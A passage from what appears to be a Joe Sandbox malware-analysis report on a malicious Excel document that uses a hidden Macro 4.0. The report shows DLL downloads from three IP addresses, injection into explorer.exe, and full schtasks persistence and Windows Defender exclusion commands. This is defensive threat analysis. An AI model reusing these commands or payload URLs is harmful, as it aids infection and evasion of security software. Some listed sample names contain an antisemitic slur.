    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2832Thread sleep count: 50 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 408Thread sleep count: 49 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 668Thread sleep count: 48 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 380Thread sleep count: 49 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 380Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2300Thread sleep count: 53 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-11362
    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-12469
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-11417
    Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-10090
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,4_2_1000D01F
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,4_2_1000AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000CAEB4 FindFirstFileW,FindNextFileW,6_2_000CAEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,14_2_000CAEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,17_2_0008AEB4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,4_2_10005F82
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,4_2_10012AEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10029660 GetProcessHeap,RtlAllocateHeap,4_2_10029660
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1007792E mov eax, dword ptr fs:[00000030h]4_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1007785D mov eax, dword ptr fs:[00000030h]4_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10077464 push dword ptr fs:[00000030h]4_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007792E mov eax, dword ptr fs:[00000030h]9_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007785D mov eax, dword ptr fs:[00000030h]9_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10077464 push dword ptr fs:[00000030h]9_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007792E mov eax, dword ptr fs:[00000030h]12_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007785D mov eax, dword ptr fs:[00000030h]12_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10077464 push dword ptr fs:[00000030h]12_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007792E mov eax, dword ptr fs:[00000030h]16_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007785D mov eax, dword ptr fs:[00000030h]16_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_10077464 push dword ptr fs:[00000030h]16_2_10077464
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000C5A61 RtlAddVectoredExceptionHandler,6_2_000C5A61
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00085A61 RtlAddVectoredExceptionHandler,17_2_00085A61

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Writes to foreign memory regionsShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102DJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102DJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102DJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 25102DJump to behavior
    Allocates memory in foreign processesShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and writeJump to behavior
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: F0000 value: 9CJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2520 base: 25102D value: E9Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: F0000 value: 9CJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 236 base: 25102D value: E9Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: B0000 value: 9CJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1256 base: 25102D value: E9Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: B0000 value: 9CJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1408 base: 25102D value: E9Jump to behavior
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Claim-680517779-09242021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'Jump to behavior
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: explorer.exe, 00000006.00000002.895140698.0000000000B70000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000C31C2 CreateNamedPipeA,6_2_000C31C2
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,4_2_1000980C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,4_2_1000D01F

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Scheduled Task/Job1Process Injection413Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsScripting2Logon Script (Windows)Logon Script (Windows)Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsNative API3Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsExploitation for Client Execution32Network Logon ScriptNetwork Logon ScriptProcess Injection413LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 489833 Sample: Claim-680517779-09242021.xls Startdate: 24/09/2021 Architecture: WINDOWS Score: 100 71 Document exploit detected (drops PE files) 2->71 73 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->73 75 Sigma detected: Schedule system process 2->75 77 5 other signatures 2->77 9 EXCEL.EXE 189 37 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 65 111.90.148.104, 49168, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 9->65 67 190.14.37.173, 49167, 80 OffshoreRacksSAPA Panama 9->67 69 51.89.115.111, 49169, 80 OVHFR France 9->69 55 C:\Users\user\...\44463.6668827546[3].dat, PE32 9->55 dropped 57 C:\Users\user\...\44463.6668827546[2].dat, PE32 9->57 dropped 59 C:\Users\user\...\44463.6668827546[1].dat, PE32 9->59 dropped 93 Document exploit detected (UrlDownloadToFile) 9->93 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        32 regsvr32.exe 20->32         started        34 regsvr32.exe 22->34         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->85 87 Injects code into the Windows Explorer (explorer.exe) 24->87 89 Writes to foreign memory regions 24->89 91 2 other signatures 24->91 36 explorer.exe 8 1 24->36         started        process9 file10 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->95 97 Injects code into the Windows Explorer (explorer.exe) 29->97 99 Writes to foreign memory regions 29->99 39 explorer.exe 8 1 29->39         started        101 Allocates memory in foreign processes 32->101 103 Maps a DLL or memory area into another process 32->103 42 explorer.exe 32->42         started        45 explorer.exe 34->45         started        53 C:\Users\user\Fiosa.der, PE32 36->53 dropped 105 Uses cmd line tools excessively to alter registry or file data 36->105 47 reg.exe 1 36->47         started        49 reg.exe 1 36->49         started        signatures11 process12 file13 79 Uses cmd line tools excessively to alter registry or file data 39->79 81 Drops PE files to the user root directory 39->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 39->83 51 schtasks.exe 39->51         started        61 C:\Users\user\Fiosa1.der, PE32 42->61 dropped 63 C:\Users\user\Fiosa2.der, PE32 45->63 dropped signatures14 process15

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Claim-680517779-09242021.xls0%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://190.14.37.173/44463.6668827546.dat0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://51.89.115.111/44463.6668827546.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://111.90.148.104/44463.6668827546.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://190.14.37.173/44463.6668827546.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://51.89.115.111/44463.6668827546.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://111.90.148.104/44463.6668827546.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAregsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.515971633.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.895240886.0000000002090000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574258941.00000000021B0000.00000002.00020000.sdmp, regsvr32.exe, 00000019.00000002.753582688.0000000000F20000.00000002.00020000.sdmpfalse
      		high
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.518300285.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.515596084.0000000001DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575010843.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.574000225.0000000001EB0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.583955951.00000000008E0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.581362480.0000000000A50000.00000002.00020000.sdmpfalse
      • Avira URL Cloud: safe
      		low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      190.14.37.173
      		unknownPanama
      		52469OffshoreRacksSAPAfalse
      51.89.115.111
      		unknownFrance
      		16276OVHFRfalse
      111.90.148.104
      		unknownMalaysia
      		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:489833
      Start date:24.09.2021
      Start time:15:58:36
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 14m 25s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Claim-680517779-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/11@0/3
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 24% (good quality ratio 22.7%)
      • Quality average: 77.1%
      • Quality standard deviation: 27.2%
      HCA Information:
      • Successful, ratio: 87%
      • Number of executed functions: 142
      • Number of non-executed functions: 92
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      16:01:08API Interceptor54x Sleep call for process: regsvr32.exe modified
      16:01:09API Interceptor877x Sleep call for process: explorer.exe modified
      16:01:11API Interceptor1x Sleep call for process: schtasks.exe modified
      16:01:12Task SchedulerRun new task: xtirgcvnp path: regsvr32.exe s>-s "C:\Users\user\Fiosa.der"

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      OffshoreRacksSAPAPayment-687700136-09212021.xlsGet hashmaliciousBrowse
      • 190.14.37.232
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      4cDyOofgzT.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      4cDyOofgzT.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      341288734918_06172021.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      341288734918_06172021.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      OVHFRproforma invoice_pdf_____________________________.exeGet hashmaliciousBrowse
      • 51.195.17.68
      NoO16S4omQ.exeGet hashmaliciousBrowse
      • 87.98.185.184
      9jV2cBN6cQ.exeGet hashmaliciousBrowse
      • 66.70.204.222
      HSBC94302,pdf.exeGet hashmaliciousBrowse
      • 51.254.53.102
      ZamCfP5Dev.exeGet hashmaliciousBrowse
      • 178.32.120.127
      zuyrzhibfm.exeGet hashmaliciousBrowse
      • 188.165.222.221
      INV, BL, PL.exeGet hashmaliciousBrowse
      • 94.23.48.114
      b3astmode.x86Get hashmaliciousBrowse
      • 37.59.48.250
      b3astmode.armGet hashmaliciousBrowse
      • 51.83.43.58
      New Order.docGet hashmaliciousBrowse
      • 164.132.171.176
      2xgbTybbdXGet hashmaliciousBrowse
      • 51.222.234.64
      qri9CgHh4MGet hashmaliciousBrowse
      • 51.222.234.64
      eerjoaAQC2Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.mpslGet hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.mipsGet hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm7Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.x86Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm5Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm4Get hashmaliciousBrowse
      • 51.222.234.64
      VwszKgEB99.exeGet hashmaliciousBrowse
      • 188.165.222.221

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443782963420258
      Encrypted:false
      SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
      MD5:BC74BF4AB8188396FD2874D71A5C4796
      SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
      SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
      SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6668827546[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
